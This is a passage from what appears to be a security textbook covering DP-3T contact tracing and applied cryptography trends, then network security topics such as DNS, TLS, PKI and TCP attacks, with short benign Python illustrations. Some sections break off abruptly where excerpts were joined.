provides secure communications only from each client to the server. The latter seems to
be much more commonly used in practice, but is of course subject to interception. This
is concerning, given that Telegram is frequently used by higher-risk users in undemocratic
countries.
to generate, using a pseudo-random generator built from AES in CTR mode, a sequence of 96
short pseudo-random strings called beacons. At each 15-minute time interval during the day,
the next beacon from the sequence is selected and broadcast using BLE. Other phones in the
vicinity pick up and record the beacon-carrying BLE signals and store them in a log along with
metadata (time of day, received signal strength). Notice that the beacons are indistinguishable
from random strings, under the assumption that AES is a good block cipher.
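A simplified sketch of this beacon generation in Python (assuming the cryptography package; the actual DP-3T specification differs in details such as how day keys are derived and beacons encoded):

```python
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def beacons_for_day(day_key: bytes, n: int = 96, size: int = 16) -> list[bytes]:
    """Expand a 32-byte day key into n pseudo-random beacons by using AES-256
    in CTR mode as a PRG, i.e., encrypting an all-zero stream."""
    prg = Cipher(algorithms.AES(day_key), modes.CTR(b"\x00" * 16)).encryptor()
    stream = prg.update(b"\x00" * (n * size))
    return [stream[i * size:(i + 1) * size] for i in range(n)]

# One beacon is broadcast over BLE per 15-minute interval: 96 x 15 min = 24 h.
```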
When a user of the system receives a positive COVID-19 test, they instruct their phone to upload
the recent day keys to a central server, possibly along with sent signal strength information.44
All phones in the system regularly poll the server for the latest sets of day keys, use them to
regenerate beacons and look in their local logs to test if at some point they came into range of
a phone carried by a person later found to be infected. Using sent and received signal strength
information in combination with the number and closeness (over time) of matching beacons,
the phone can compute a risk score. If the score is above a threshold, then the phone user can
be instructed to get a COVID-19 test themselves. Setting the threshold in practice to balance
false positives against false negatives is a delicate exercise made more difficult by the fact
that BLE permits only inaccurate range estimation.
Notice that the central server in DP-3T stores only day keys released from phones by infected
parties. The central server is not capable of computing which users were in proximity to which
other users, nor even the identity of users who uploaded keys (though this information will
become visible to the health authority because of the issuance of authorisation codes). All
the comparison of beacons and risk computations are carried out on users’ phones. One
can contend that a fully centralised system could provide more detailed epidemiological
information — some epidemiologists unsurprisingly made this argument. On the other hand,
the strict purpose of the DP-3T system was to enable automated contact tracing, not to provide
an epidemiological research tool. A more detailed privacy analysis of DP-3T can be found
in [1718].
The DP-3T design was produced, analysed, prototyped and deployed under test conditions all
in the space of a few weeks. After adoption and adaptation by Google and Apple, it made its
way into national contact tracing apps within a few months. Given the pace of development,
simplicity of the core design was key. Only “off the shelf” cryptographic techniques available
in standard cryptographic libraries could be used. Given the likely scaling properties of the
system (possibly tens of millions of users per country) and the constraints of BLE message
sizes, using Public Key Cryptography was not an option; only symmetric techniques could
be countenanced. Many follow-up research papers have proposed enhanced designs using
more complex cryptographic techniques. The DP-3T team did not have this luxury and instead
stayed resolutely pragmatic in designing a system that balances privacy, functionality and
ease of deployment, and that resists repurposing.
44
To prevent spurious uploads, the day keys can only be uploaded after entering an authorisation code issued
by the local health authority into the app.
• Another growth area for applied cryptography is in privacy-preserving techniques for data-
mining and data aggregation. Google’s privacy-preserving advertising framework [1729]
provides one prominent example. Another is the Prio system [461] that allows privacy-
preserving collection of telemetry data from web browsers. Prio has been experimentally
deployed in Mozilla’s Firefox browser.46
• Electronic voting (e-voting) has long been touted as an application area for cryptography.
There is a large scientific literature on the problem. However, the use of e-voting in
local and national elections has proved problematic, with confidence-sapping security
vulnerabilities having been found in voting software and hardware. For example, a recent
Swiss attempt to develop e-voting was temporarily abandoned after severe flaws were
found in some of the cryptographic protocols used in the system during a semi-open
system audit [1730]. The Estonian experience has been much more positive, with a
system built on Estonia’s electronic identity cards having been in regular use (and having
seen regular upgrades) since 2005. Key aspects of the Estonian success are openness,
usability and the population’s broad acceptance of and comfort with online activity.
• We may see a shift in how cryptography gets researched, developed and then deployed.
The traditional model is the long road from research to real-world use. Ideas like MPC
have been travelling down this road for decades. Out of sheer necessity, systems like DP-
3T have travelled down the road much more quickly. A second model arises when practice
gets ahead of theory and new theory is eventually developed to analyse what is being
done in practice; often this leads to a situation where the practice could be improved by
following the new theory, but the improvements are slow in coming because of the drag
of legacy code and the difficulty of upgrading systems in operation. Sometimes a good
attack is needed to stimulate change. A third model is represented by TLS 1.3: academia
and industry working together to develop a complex protocol over a period of years.
• Cryptography involves a particular style of thinking. It involves quantifying over all adver-
saries in security proofs (and not just considering particular adversarial strategies), being
conservative in one’s assumptions, and rejecting systems even if they only have “certifi-
cational flaws”. Such adversarial thinking should be more broadly applied in security
research. Attacks on machine learning systems are one area where this cross-over is already
bearing fruit.
Topics Cites
18.1 Algorithms, Schemes and Protocols [963, 1619, 1620]
18.2 Cryptographic Implementation [405, 1453, 1637, 1677]
18.3 Key Management [1620, 1666, 1696, 1697]
18.4 Consuming Cryptography
18.5 Applied Cryptography in Action [444, 1480, 1718]
18.6 The Future of Applied Cryptography
46
See https://blog.mozilla.org/security/2019/06/06/next-steps-in-privacy-preserving-telemetry-with-prio/.
INTRODUCTION
The ubiquity of networking allows us to connect all sorts of devices and gain unprecedented
access to a whole range of applications and services anytime, anywhere. However, our heavy
reliance on networking technology also makes it an attractive target for malicious users who
are willing to compromise the security of our communications and/or cause disruption to
services that are critical for our day-to-day survival in a connected world. In this chapter, we
will explain the challenges associated with securing a network under a variety of attacks for a
number of networking technologies and widely used security protocols, along with emerging
security challenges and solutions. This chapter aims to provide the necessary background in
order to understand other knowledge areas, in particular the Security Operations & Incident
Management Knowledge Area (Chapter 8) which takes a more holistic view of security and
deals with operational aspects. An understanding of the basic networking protocol stack
and popular network protocols is assumed. Standard networking text books explain the
fundamentals of the layered Internet Protocol suite [1731, 1732].
This chapter is organized as follows. In Section 19.1, we lay out the foundations of this chapter
and define security goals in networked systems. As part of this, we also outline attackers and
their capabilities that threaten these goals. In Section 19.2, we describe six typical networking
scenarios that illustrate why security in networking is important and why achieving it can be
non-trivial. We then discuss the security of the various networking protocols in Section 19.3,
structured by the layered architecture of the Internet protocol stack. In Section 19.4, we
present and discuss several orthogonal network security tools such as firewalls, monitoring
and Software Defined Networking (SDN). We complete this chapter with a discussion on how
to combine the presented mechanisms in Section 19.5.
CONTENT
availability ensures that data and services are accessible to their designated users at all
times. In our email scenario, a Denial of Service (DoS) attacker may aim to threaten the
availability of email servers in order to prevent or delay email communication.
Next to the CIA triad, there are more subtle security goals, not all of which apply in each and
every application scenario. Authenticity is ensured if the recipient can reliably attribute the
origin of communication to the sender. For example, an email is authentic if the recipient can
ensure that the claimed sender actually sent this email. Non-repudiation extends authenticity
such that we can prove authenticity to arbitrary third parties, i.e., allowing for public verification.
In our email scenario, non-repudiation allows the email recipient to prove to anyone else that
a given email stems from a given sender. Anonymity means that communication cannot
be traced back to its sender (sender anonymity) and/or recipient (recipient anonymity). For
example, if an attacker sends a spoofed email that cannot be reliably traced back to its actual
sender (e.g., the correct personal identity of the attacker), it is anonymous. There are further
privacy-related guarantees such as unlinkability that go beyond the scope of this chapter and
are defined in the Privacy & Online Rights Knowledge Area (Chapter 5).
To achieve security goals, we will heavily rely on cryptographic techniques such as public and
symmetric keys for encryption and signing, block and stream ciphers, hashing, and digital
signatures, as described in the Cryptography Knowledge Area (Chapter 10) and the Applied
Cryptography Knowledge Area (Chapter 18). Before showing how we can use these techniques
for secure networking, though, we will discuss attacker models that identify capabilities of
possible attackers of a networked system.
suspected TCP connection between two parties. Similarly, off-path attackers could abuse high-
bandwidth links and forge Internet Protocol (IP) headers (IP spoofing, see Section 19.3.2.4)
to launch powerful and anonymous Denial of Service (DoS) attacks. Using forged routing
protocol messages, off-path attackers may even try to become on-path attackers.
In addition, the position of attackers heavily influences their power. Clearly, a single Internet
user has less power than an entire rogue Internet Service Provider (ISP). The single user can
leverage their relatively small bandwidth to launch attacks, while an ISP can generally also sniff
on and alter communication, abuse much larger bandwidths, and correlate traffic patterns.
Then again, as soon as attackers aggregate the power of many single users/devices (e.g., in
form of a botnet), their overall power amplifies. Attackers could also be in control of certain
Internet services, routers, or any combination thereof. We also distinguish between insider
and outsider attackers, which are either inside or outside of a trusted domain, respectively.
Overall, we model (i) where attackers can be positioned, (ii) who they are, and (iii) which capa-
bilities they have. Unfortunately, in strong adversarial settings, security guarantees diminish
all too easily. For example, strong anonymity may not hold against state actors who can
(theoretically) control major parts of the Internet, such as Tier-1 ISPs. Similarly, availability is hard
to maintain for spontaneous and widely distributed DoS incidents.
Consequently, even though a LAN is conceptually simple, we still have uncertainties regarding
LAN security: Can we control which devices become part of a network to exclude untrusted
clients and/or device configurations? (Sections 19.3.4.1 and 19.4.5) Can we monitor their
actions to identify attackers and hold them accountable? (Section 19.4.3) Can we partition
larger local networks into multiple isolated partitions to mitigate potential damage? (Sec-
tion 19.3.4.5)
Software Defined Networking (SDN) is our final use case. SDN is, strictly speaking, not a
networking application, but rather a technology that enables dynamic and efficient network
configuration. Yet it raises just as many security implications as the other applications do.
SDN aims to ease network management by decoupling packet forwarding (data plane) from
packet routing (control plane). This separation and the underlying flow handling have enabled
drastic improvements from a network management perspective, especially in highly-
dynamic environments such as data centers. The concept of Network Functions Virtualisation
(NFV) complements SDN and allows network node functions such as load balancers or
firewalls to be virtualized.
We will revisit SDN by discussing the following questions: How can SDN help in network
design and better monitoring? Can NFV help secure networks by virtualizing security
functions? Are there new, SDN-specific threats? (Section 19.4.4)
Figure 19.1: A client and a server communicating via a network, each running the layered Internet protocol suite.
After having introduced several networking applications, we now turn to the security of net-
working protocols. To guide this discussion, we stick to a layered architecture that categorizes
protocols and applications. Indeed, a complex system such as distributed applications run-
ning over a range of networking technologies is best understood when viewed as a layered
architecture. Figure 19.1 shows the 4-layer Internet protocol suite and the interaction between
the various layers. For each layer, we know several network protocols—some of which are
quite generic, and others that are tailored for certain network architectures. The Internet is
the predominant architecture today, and nicely maps to the TCP/IP model. It uses the Internet
Protocol (IP) (and others) at the Internet layer, and UDP/TCP (and others) at the transport
layer—hence, the Internet protocol suite is also known as the TCP/IP stack.
Other networking architectures such as automotive networks use completely different sets of
protocols. It is not always possible to map their protocols directly onto the layered architecture of
the TCP/IP model. Consequently, more fine-grained abstractions such as the ISO/OSI model
extend this layered architecture. For example, the ISO/OSI model splits the link layer into two
parts, namely the data link layer (node-to-node data transfer) and the physical layer (physical
transmission and reception of raw data). The ISO/OSI model defines a network layer instead
of an Internet layer, which is more inclusive to networks that are not connected to the Internet.
Finally, ISO/OSI defines two layers below the application layer (presentation and session).
The vast majority of topics covered in this chapter do not need the full complexity of the
ISO/OSI model. In the following, we therefore describe the security issues and according
countermeasures at each layer of the TCP/IP model. We thereby follow a top-down approach,
starting with application-layer protocols, and slowly going down to the lower layers until the
link layer. Whenever possible, we abstract from the protocol specifics, as many discussed
network security principles can be generically applied to other protocols.
As a first example of an application-layer security protocol, we will look at secure email. Given
its age, the protocol for exchanging emails, Simple Mail Transfer Protocol (SMTP), was not
designed with security in mind. Yet email remains in widespread business use. Communicating parties
typically want to prevent others from reading (confidentiality) or altering (integrity) their emails.
Furthermore, they want to verify the sender’s identity when reading an email (authenticity).
Schemes like Pretty Good Privacy (PGP) and Secure Multipurpose Internet Mail Extensions
(SMIME) provide such end-to-end security for email communication. Their basic idea is that
each email user has their own private/public key pair–see the Cryptography Knowledge Area
(Chapter 10) for the cryptographic details, and Section 19.3.2.2 for a discussion of how this key
material can be shared. The sender signs the hash of a message using the sender’s private key,
and sends the resulting signature along with the (email) message to the recipient. The recipient can then
validate the email’s signature using the sender’s public key. Checking this signature allows for
an integrity check and authentication at the same time, as only the sender knows their private
key. Furthermore, this scheme provides non-repudiation as it can be publicly proved that the
hash (i.e., the message) was signed by the sender’s private key. To gain confidentiality, the
sender encrypts the email before submission using “hybrid encryption”. That is, the sender
creates a fresh symmetric key used for message encryption, which is significantly faster than
using asymmetric cryptography. The sender then shares this symmetric key with the recipient,
encrypted under the recipient’s public key.
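The following Python sketch captures the essence of this sign-plus-hybrid-encryption pattern (assuming the cryptography package; PGP and S/MIME use their own packet formats and algorithm choices, so this is only an illustration):

```python
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

sender_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
recipient_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"Quarterly numbers attached."

# Authenticity and integrity: sign a hash of the message with the sender's
# private key; anyone holding the sender's public key can verify it.
signature = sender_key.sign(
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256())

# Confidentiality via hybrid encryption: a fresh symmetric key encrypts the
# bulk data, and only that small key travels under the recipient's public key.
session_key, nonce = os.urandom(32), os.urandom(12)
ciphertext = AESGCM(session_key).encrypt(nonce, message + signature, None)
wrapped_key = recipient_key.public_key().encrypt(
    session_key,
    padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                 algorithm=hashes.SHA256(), label=None))
# The email then carries (wrapped_key, nonce, ciphertext).
```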
This very same scheme can be applied to other client-to-client communication. For example,
instant messengers (e.g., WhatsApp, Threema or Signal) or video conference systems can use
this general principle to achieve the same end-to-end guarantees. One remaining challenge
for such strong guarantees to hold is that user identities (actually, their corresponding key
material) have to be reliably validated [1739]. The Applied Cryptography Knowledge Area
(Chapter 18) has more details.
Not all email users leverage such client-to-client security schemes, though. Both PGP and
SMIME have usability challenges (e.g., key distribution, difficulty of indexed searches, etc.) that
hamper wide adoption [347]. To address this issue, we can secure mail protocols (SMTP, but
also Internet Message Access Protocol (IMAP) and Post Office Protocol (POP)) with the help
of TLS (see Section 19.3.2.1). By wrapping them in TLS, we at least achieve hop-by-hop security,
e.g., between client and their mail submission server or between mail servers during email
transfer. Consequently, we can protect email submission, retrieval and transport from on-path
adversaries. However, even though communication is protected hop-by-hop, curious mail
server operators can see emails in the clear. Only end-to-end security schemes like PGP/SMIME
protect against untrusted mail server operators.
There are other challenges to secure email, such as phishing and spam detection, which are
described in depth in the Adversarial Behaviours Knowledge Area (Chapter 7).
The most prominent application-layer protocol, the Hypertext Transfer Protocol (HTTP), was
designed without any security considerations. Yet, the popularity of HTTP and its unprece-
dented adoption for e-commerce imposed strict security requirements on HTTP later on.
Its secure counterpart HTTPS wraps HTTP using a security protocol at the transport layer
(TLS, see Section 19.3.2.1), which can be used to provide confidentiality and integrity for the
entire HTTP communication—including URL, content, forms and cookies. Furthermore, HTTPS
allows clients to implicitly authenticate web servers using certificates. HTTPS is described in
much greater detail in the Web & Mobile Security Knowledge Area (Chapter 16).
In its primary use case, the Domain Name System (DNS) translates host names to their
corresponding IP addresses. A hierarchy of authoritative name servers (NSs) maintains this
mapping. Resolving NSs (resolvers) iteratively look up domain names on behalf of clients. In
such an iterative lookup, the resolver would first query the root NSs, which then redirect the
resolver to NSs lower in the DNS hierarchy, until the resolver contacts an NS that is authoritative
for the queried domain. For example, in a lookup for a domain sub.example.com, a root
NS would redirect the resolver to an NS that is authoritative for the .com zone, which in turn
tells the resolver to contact the NS authoritative for *.example.com. To speed up these
lookups, resolvers cache DNS records according to a lifetime determined by their authoritative
NSs. To minimize privacy leaks towards NSs in the upper hierarchy, resolvers can minimize
query names such that NSs higher up in the hierarchy do not learn the fully-qualified query
name [1740].
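To make the iterative lookup concrete, the fragment below performs its first step by hand, assuming the third-party dnspython package (198.41.0.4 is a.root-servers.net):

```python
import dns.message
import dns.query
import dns.rdatatype

# Ask a root name server for sub.example.com. The root is not authoritative
# for that name, so instead of an answer it returns a referral: the authority
# section lists the NSs for the .com zone, which the resolver queries next,
# and so on down the hierarchy until an authoritative answer is obtained.
query = dns.message.make_query("sub.example.com", dns.rdatatype.A)
response = dns.query.udp(query, "198.41.0.4", timeout=3)
for rrset in response.authority:
    print(rrset)
```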
Unfortunately, multiple attacks aim to abuse the lack of authentication in plain text DNS. A
PITM attacker can impersonate a resolver, return bogus DNS records and divert traffic to a
malicious server, thus allowing them to collect user passwords and other credentials. In a DNS
cache poisoning attack, adversaries aim to implant bogus name records, thus diverting a user’s
traffic towards the target domain to attacker-controlled servers. Learning from these attacks,
the IETF introduced the DNS Security Extensions (DNSSEC). DNSSEC allows authoritative
name servers to sign DNS records using their private key. The authenticity of the DNS records
can be verified by a requester using the corresponding public key. In addition, a digital signature
provides integrity for the response data. The overall deployment of DNSSEC at the top-level
domain root name servers—a fundamental requirement to deploy DNSSEC at lower levels in
the near future—steadily increases [1741].
DNSSEC explicitly does not aim to provide confidentiality, i.e., DNS records are still communi-
cated unencrypted. DNS over TLS (DoT) and DNS over HTTPS (DoH) address this problem.
They provide end-to-end security between the DNS client and its chosen resolver, by tunneling
DNS via secure channels, namely TLS (see Section 19.3.2.1) or HTTPS (see Section 19.3.1.2),
respectively. More and more popular Web browsers (e.g., Chrome, Firefox) enable DoH by
default, using selected resolvers preconfigured by the browser vendors. This resulted in a
massive centralization of DNS traffic towards just a few resolvers. Such a centraliza-
tion puts resolvers in a quite unique position with the power of linking individual clients (by
IP addresses) to their lookups. Oblivious DNS Over HTTPS (ODoH) addresses this issue by
adding trusted proxies between DNS clients and their chosen resolvers [1742].
Irrespective of these security protocols, resolvers are in a unique situation to monitor name
resolutions of their clients. Resolver operators can leverage this in order to protect clients by
offering some sort of blocklist of known “misbehaving” domains which have a bad reputation.
Such DNS filtering has the potential to mitigate cyber threats, e.g., by blocking phishing
domains or command & control domains of known malware variants.
Finally, DNS is prone to Distributed Denial of Service (DDoS) attacks [1743]. DNS authoritative
servers can be targeted by NXDOMAIN attacks, in which an IP-spoofing client looks up many
unassigned subdomains of a target domain at public (open) resolvers. Subdomains are
typically chosen at random and are therefore not cached, hence sometimes referred to as
random subdomain attack. Consequently, the resolvers have to forward the lookups and hence
flood the target authoritative name server. In another type of DDoS attack, DNS servers (both
resolvers and authoritatives) are regularly abused for amplification DDoS attacks, in which
they reflect IP-spoofed DNS requests with significantly larger responses [1744]. Reducing the
number of publicly-reachable open DNS resolvers [1745] and DNS rate limiting can mitigate
these problems.
The Network Time Protocol (NTP) is used to synchronise devices (hosts, servers, routers, etc.)
to within a few milliseconds of Coordinated Universal Time (UTC). NTP clients request times
from NTP servers, taking into account round-trip times of this communication. In principle,
NTP servers use a hierarchical security model implementing digital signatures and other
standard application-layer security mechanisms to prevent transport-layer attacks such as
replay or PITM. However, these security mechanisms are rarely enforced, easing attacks that
shift the time of a target system [1746] in both on-path and off-path settings. In fact, such time
shifting attacks may have severe consequences, as they, e.g., allow attackers to use outdated
certificates or force cache flushes. The many NTP clients that rely on just a few
NTP servers on the Internet to obtain their time are especially prone to this attack [1747]. To
counter this threat, network operators should install local NTP servers that use and compare
multiple trusted NTP server peers. Alternatively, hosts can use NTP client implementations
that offer provably secure time crowdsourcing algorithms [1748].
There are two main threats to DHTs: (i) Eclipse and (ii) Sybil attacks. An Eclipse attacker aims
to poison routing tables to isolate target nodes from other, benign overlay peers. Redundancy
helps best against Eclipse attacks. For example, systems like Kademlia foresee storage and
routing redundancy, which mitigate some low-profile attacks against DHTs. In the extreme,
DHT implementations can use dedicated routing tables with verified entries [1749]. Central
authorities—which lower the degree of distribution of DHTs, though—can solve the underlying
root problem and assign stable node identifiers [1088].
In a Sybil attack, an adversary introduces malicious nodes with self-chosen identifiers to
subvert DHT protocol redundancy [1084]. To prevent such Sybils, one can limit the number
of nodes per entity, e.g., based on IP addresses [1749]—yet causing collateral damage to
nodes sharing this entity (e.g., multiple peers behind a NAT gateway). Others suggested using
peer location as an identifier validation mechanism, which, however, prevents nodes from
relocating [1750]. Computational puzzles can slow down the pace at which attackers can
inject malicious peers [1751], but are ineffective against distributed botnet attacks. Finally,
reputation systems enable peers to learn trust profiles of their neighbors, which ideally
discredit malicious nodes [1752].
Unfortunately, all these countermeasures either restrict the generality of DHTs, or introduce a
centralized component. Therefore, most defenses have not fully evolved from academia
into practice. A more complete treatment of DHT security is provided by Urdaneta and
van Steen [1088] and in the Distributed Systems Security Knowledge Area (Chapter 12).
by Tor clients that know the server identity (a hash over their public key). As onion services
receive data via Tor circuits and can never be contacted directly, their identity remains hidden.
While Tor gives strong anonymity guarantees, it is not fully immune to deanonymisation.
In particular, traffic analysis and active traffic delay may help to infer the communication
partners, especially if entry and exit node collaborate. In fact, it is widely accepted that power-
ful adversaries can link communication partners by correlating traffic entering and leaving
the Tor network [515, 1754]. Furthermore, patterns such as inter-arrival times or cumulative
packet sizes were found sufficient to attribute encrypted communication to a particular web-
site [1755]. Consequently, attackers may be able to predict parts of the communication content
even though communication is encrypted and padded. As a response, researchers explored
countermeasures such as constant rate sending or more efficient variants of it [1756].
Orthogonal to ACNs, censorship-resistant networks aim to prevent attackers from suppressing
communication. The typical methodology here is to blend blocklisted communication into
allowed traffic. For example, decoy routing uses on-path routers to extract covert (blocklisted)
information from an overt (allowed) channel and redirects this hidden traffic to the true
destination [581]. Similarly, domain fronting leverages allowed TLS endpoints to forward a
covert stream—hidden in an allowed TLS stream—to the actual endpoint [578]. Having said
this, nation state adversaries have the power to turn off major parts (or even all) of the
communication to radically subvert these schemes at the expense of large collateral damage.
Application-layer protocols rely on the transport layer to provide confidentiality, integrity and
authentication mechanisms. These capabilities are provided by a shim layer between the
application and transport layers, called Transport Layer Security (TLS). In this section,
our discussion is greatly simplified and covers just the basics of the TLS protocol. For a
more detailed discussion, including the history of TLS and past vulnerabilities, see the Applied
Cryptography Knowledge Area (Section 18.5).
We discuss the most recent and popular TLS versions 1.2 and 1.3, with a particular focus
on their handshakes. Irrespective of the TLS version, the handshake takes care of crypto-
graphic details that application-layer protocols otherwise would have to deal with themselves:
authenticating each other, agreeing on cryptographic cipher suites, and deriving key material.
The handshakes differ between the two TLS versions, as shown in Figure 19.2. We start
discussing TLS 1.2, as shown on the left-hand side of the figure. First, client and server
negotiate which TLS version and cipher suites to use in order to guarantee compatibility
even among heterogeneous communication partners. Second, server and client exchange
certificates to authenticate each other, although client authentication is optional (and for
brevity, omitted in Figure 19.2). Certificates contain communication partner identifiers such
as domain names for web servers, and include their vetted public keys (see Section 19.3.2.2
for details). Third, the communication partners derive a symmetric key that can be used to
secure the data transfer.
Figure 19.2: TLS Handshake: Comparison between TLS 1.2 (on the left) and TLS 1.3 (on the
right), excluding the optional steps for client authentication.
To derive a key, the client can encrypt a freshly generated symmetric
key under the server’s public (e.g., RSA) key. Alternatively, the partners can derive a key using
a Diffie-Hellman Key Exchange (DHKE). The DHKE provides TLS with perfect forward secrecy
that prevents attackers from decrypting communication even if the server’s private key leaks.
As a final step, the handshake then validates the integrity of the handshake session. From now
on, as part of the data transfer phase, TLS partners use the derived key material to encrypt
and authenticate the subsequent communication.
TLS 1.3, as shown on the right of Figure 19.2, streamlines this handshake. Without
sacrificing security guarantees, TLS 1.3 reduces the number of round-trip times to one (1-
RTT). TLS 1.3 no longer supports RSA-based key exchanges in favor of DHKE. The client
therefore guesses the chosen key agreement protocol (e.g., DHKE) and sends its key share
right away in the first step. The server would then respond with the chosen protocol, its
key share, certificate and a signature over the handshake (in a CertificateVerify message). If
the client was connected to the server before, TLS 1.3 even supports a handshake without
additional round-trip time (0-RTT)—at the expense of weakening forward secrecy and replay
prevention. Finally, as the Formal Methods for Security Knowledge Area (Chapter 13) explores,
TLS 1.3 has the additional benefit that it has been formally verified to be secure [1719, 1757].
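From an application's perspective, all of this complexity is hidden behind a few library calls. A small Python sketch using the standard ssl module (the host name is illustrative):

```python
import socket
import ssl

# create_default_context() applies sensible defaults: a minimum protocol
# version, vetted cipher suites and certificate verification against the
# system trust store.
context = ssl.create_default_context()
with socket.create_connection(("example.org", 443)) as sock:
    # wrap_socket() runs the full handshake of Figure 19.2: version and
    # cipher-suite negotiation, certificate validation and key derivation.
    with context.wrap_socket(sock, server_hostname="example.org") as tls:
        print(tls.version())   # e.g. 'TLSv1.3'
        print(tls.cipher())    # the negotiated cipher suite
```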
We now briefly discuss how TLS successfully secures against common network attacks.
First, consider an eavesdropper that wants to obtain secrets from captured TLS-protected
traffic. As the user data is encrypted, no secrets can be inferred. Second, in an IP spoofing
attack, attackers may try to get one of the TLS partners to accept bogus data. However,
attackers lack the secret key needed to inject validly encrypted content. Third, data cannot be altered either, as
TLS protects data integrity using authenticated encryption or message authentication codes.
Finally, even a strong PITM attack is prevented by the help of certificates that authenticate
the parties—unless the PITM attacker can issue certificates that the TLS partners trust, as
discussed next. The TLS protocol also guarantees that payload arrives at the application in
order, detects dropped and modified content, and effectively prevents replay attacks that
resend the same encrypted traffic to duplicate payload. Having said this, TLS does not prevent
attackers from delaying parts or all of the communication.
So far we have simply assumed that communication partners can reliably obtain trustworthy
public keys from each other. However, in the presence of active on-path attackers, how can one
trust public keys exchanged via an insecure channel? The fundamental “problem” is that,
conceptually, everyone can create public/private key pairs. Public-Key Infrastructure (PKI)
provides a solution for managing trustworthy public keys (and, implicitly, their private key
counterparts). Government agencies or standard organisations appoint registrars who issue
and keep track of so-called certificates on behalf of entities (individuals, servers, routers, etc.).
Assume a user wants to obtain a trusted certificate and the corresponding key material.
To this end, the user first generates a public/private key pair on their own hardware. The
private key is never shared with anyone. The public key becomes part of a certificate signing
request (CSR) that the user sends to a registration authority. Before this authority signs the
certificate as requested, the user has to prove their identity (e.g., possession of a domain
name for an HTTPS certificate, or personal identifiers for an S/MIME certificate) to registrars.
The registrar’s signature prevents forgery, as anyone can now verify the certificate using the
(publicly known or similarly verifiable) registrar’s public key. The resulting certificate contains
the user’s identity and public key, as well as CA information and a period of certificate validity.
Its format and the associated PKI management procedures are specified in RFC 1422 and the
ITU X.509 standard.
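The client-side steps of this process map directly onto library calls. A hedged Python sketch using the cryptography package (the subject name is illustrative):

```python
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# 1. Generate the key pair locally; the private key never leaves this machine.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# 2. Build a CSR that binds the public key to the claimed identity.
csr = (x509.CertificateSigningRequestBuilder()
       .subject_name(x509.Name(
           [x509.NameAttribute(NameOID.COMMON_NAME, "www.example.com")]))
       .sign(key, hashes.SHA256()))

# 3. The PEM-encoded CSR is sent to the registration authority, which checks
#    the claimed identity before a certificate is issued and signed.
print(csr.public_bytes(serialization.Encoding.PEM).decode())
```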
The existing PKI model has faced several challenges, as evidenced by cases where CAs
have issued certificates in error, or under coercion, or through their own infrastructure being
attacked. As a response, CAs publish a list of revoked/withdrawn certificates, which can be
queried using the Online Certificate Status Protocol (OCSP) as defined in RFC 6960, or is
piggy-backed (“stapled”) in TLS handshakes. To avoid wrong (but validated) certificates being
issued, browsers temporarily started “pinning” them. However, this practice was quickly
abandoned and deprecated in major browsers, as it turned out to be prone to human errors
(in case of key theft or key loss). Instead, big players such as Google or Cloudflare started
collecting any observed and valid certificates in public immutable logs. TLS clients such as
browsers can then opt to refuse non-logged certificates. This scheme, known as Certificate
Transparency (CT) [1758], forces attackers to publish their rogue certificates. Consequently,
certificate owners can notice whether malicious parties have started abusing their identities
(e.g., domains).
The web of trust is an alternative, decentralized PKI scheme where users can create a com-
munity of trusted parties by mutually signing certificates without needing a registrar. The
PGP scheme we discussed in Section 19.3.1.1 and its prominent implementation GNU Privacy
Guard (GPG) is a good example, in which users certify each other’s key authenticity.
A more detailed PKI discussion is part of the Applied Cryptography Knowledge Area (Sec-
tion 18.3.8).
TLS does a great deal in protecting the TCP payloads and prevents session hijacks and packet
injection. Yet what about the security of TCP headers of TLS connections or other, non-TLS
connections? In fact, attackers could try launching TCP reset attacks that aim to maliciously
tear down a target TCP connection. To this end, they guess or bruteforce valid sequence
numbers, and then spoof TCP segments with the RST flag being set. If the spoofed sequence
numbers hit the sliding window, the receiving party will terminate the connection. Two main
orthogonal solutions to this problem are deployed in practice: (i) TCP/IP stacks have to
ensure strong randomness for (initial) sequence number generation. (ii) Deny RST segments
with sequence numbers that fall in the middle of the sliding window. Conceptually, these
defenses are ineffective against on-path attackers that can reliably manipulate TCP segments
(e.g., dropping payload and setting the RST flag). Having said this, Weaver et al. [1759] show
that race conditions allow for detecting RST attacks launched by off-path attackers even if
they can infer the correct sequence number.
A SYN Flooding attacker keeps sending TCP SYN segments and forces a server to allocate
resources for half-opened TCP connections. When servers limit the number of half-opened
connections, benign clients can no longer establish TCP connections to the server. To mitigate
this session exhaustion, servers can delete a random half-opened session whenever a new
session needs to be created—potentially deleting benign sessions, though. A defence known
as SYN Cookies has been implemented by operating systems as a more systematic response
to SYN floods [RFC4987]. When enabled, the server does not half-open a connection right
away on receiving a TCP connection request. It selects an Initial Sequence Number (ISN)
using a hash function over source and destination IP addresses, port numbers of the SYN
segment, a timestamp with a resolution of 64 seconds, as well as a secret number only known
to the server. The server then sends the client this ISN in the SYN/ACK message. If the request
is from a legitimate sender, the server receives an ACK message with an acknowledgment
number which is ISN plus 1. To verify if an ACK is from a benign sender, the server thus again
computes the SYN cookie using the above-mentioned data, and checks if the acknowledgment
number in the ACK segment minus one corresponds to the SYN cookie. If so, the server opens
a TCP connection, and only then starts using resources. A DoS attacker would have to waste
resources themselves and reveal the true sending IP address to learn the correct ISN, hence
restoring fairness in resource consumption.
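The cookie itself is essentially a keyed hash over the connection's identifying data. A simplified Python sketch (real TCP/IP stacks additionally encode MSS information into the ISN):

```python
import hashlib
import hmac
import os
import time

SECRET = os.urandom(16)  # known only to the server

def syn_cookie(src_ip: str, dst_ip: str, sport: int, dport: int) -> int:
    """Derive a 32-bit ISN from the connection 4-tuple, a coarse timestamp
    (64-second resolution) and the server-side secret."""
    t = int(time.time()) // 64
    msg = f"{src_ip}|{dst_ip}|{sport}|{dport}|{t}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4],
                          "big")

# On SYN:  reply with SYN/ACK carrying seq = syn_cookie(...); keep no state.
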